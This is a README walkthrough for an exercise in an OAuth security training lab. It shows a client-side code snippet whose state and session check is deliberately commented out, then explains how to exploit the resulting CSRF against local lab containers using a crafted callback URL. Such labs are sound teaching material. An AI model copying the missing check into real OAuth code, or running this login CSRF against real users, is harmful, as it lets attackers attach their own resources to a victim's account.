Skip to content

Latest commit

 

History

History

ex1

README.md

Exercise 1

This is an exercise that exploits the lack of checking of the state parameter. The goal is to tie the attacker's resources to the victim's account by persuading the victim to click on the link.

Setup

$ git clone https://github.com/melonattacker/oauth-exploit-lab.git
$ cd oauth-exploit-lab/exercise/ex1
$ docker-compose up -d

URL

target URL
client http://localhost:10000
crawler http://localhost:10003

Account

username password
bob(attacker) hoge
tom(victim) huga

Writeup

You can see that the client is missing the state parameter and the user integrity check.

    # check state and session
    State = Query()
    res = db.search(State.state == request.args.get('state'))
    if len(res) == 0:
        return render_template('error.html', error='State value did not match')
    # if res[0]['user'] != session.get('name'):
    #     return render_template('error.html', error='State value did not match')

This makes it vulnerable to CSRF attacks. To exploit this, an attacker go through the authorization process under his account and pause immediately after authorization. Then send this url to the logged-in victim.

First go through the authorization process and create a URL containing the authorization code and state. To do that, you can use exploit/create_url.py.

$ python3 exploit/create_url.py        
Fishing URL: http://localhost:10000/callback?code=XCXV9OXN&state=8QKHH8XMYY08ZB9ZQXNHZJ10NSV50GI6

Then have the crawler(http://localhost:10003) visit the created URL. You need to change the hostname in the url from localhost to client. ex. http://localhost:10000/callback?code=CZI9SLH2&state=ZEM0WA9E1YXYY3LFVQC06L43SRDYDOZV => http://client:10000/callback?code=CZI9SLH2&state=ZEM0WA9E1YXYY3LFVQC06L43SRDYDOZV

When it's done, you'll see a response like this.

The attacker's resource was tied to the victim's client account.

Please visit below link as victim(tom).

http://localhost:10000/fetch_resource?access_token=SWUO9XS63NDI3W9CKQ3594SS845AMVMKJ5D44YPO1ORGI2E7ZKT2H6IOG35509M9

If you visit the link given as victim(tom), you can see that the account is pointing to attacker(bob)'s resource.